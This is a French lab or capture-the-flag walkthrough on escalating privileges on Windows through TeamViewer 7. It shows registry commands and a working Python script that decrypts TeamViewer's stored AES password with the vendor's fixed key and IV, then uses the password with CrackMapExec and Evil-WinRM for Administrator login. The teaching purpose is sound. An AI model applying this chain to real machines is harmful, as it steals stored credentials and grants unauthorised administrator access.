TeamViewer - Vulnerable Processes (Windows Privilege Escalation)

Si l’on observe les tâches en cours d’exécution, on peut voir TeamViewer version 7.

tasklist /svc

En cherchant dans les scripts de Metasploit, on en trouve un qui permet de récupérer le mot de passe de TeamViewer :

locate teamviewer | grep metasploit

En analysant le script, il faut tout d'abord obtenir la clé (en fonction de la version) depuis le registre :

HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7', 'Version

Ensuite, on doit examiner les propriétés de sécurité, en particulier le mot de passe AES :

cd HKLM:SOFTWARE\WOW6432Node\TeamViewer\\Version7

(Get-ItemProperty .).SecurityPasswordAES

On va mettre dans ciphertext les octets suivants :

255,155,28,115,214,107,206,49,172,65,62,174,19,27,70,79,88,47,108,226,209,225,243,218,126,141,55,107,38,57,78,91

Script Python Automatisation:

Voici le script qui automatise tout cela :

from itertools import product
from Crypto.Cipher import AES 
import Crypto.Cipher.AES

IV = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"


decipher = AES.new(key,AES.MODE_CBC,IV)
ciphertext = bytes([255,155,28,115,214,107,206,49,172,65,62,174,19,27,70,79,88,47,108,226,209,225,243,218,126,141,55,107,38,57,78,91])


plaintext = decipher.decrypt(ciphertext).decode()
print(plaintext)

Le mot de passe est !R3m0te!.

On va vérifier avec CrackMapExec si le mot de passe est correct pour l'utilisateur Administrator :

crackmapexec smb 10.10.10.180 -u 'Administrator' -p '!R3m0te!'

On se connecte avec Evil-WinRM, car le service d'administration de Windows à distance est actif sur le port 5985 :

evil-winrm -i 10.10.10.180 -u 'Administrator' -p '!R3m0te!'

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?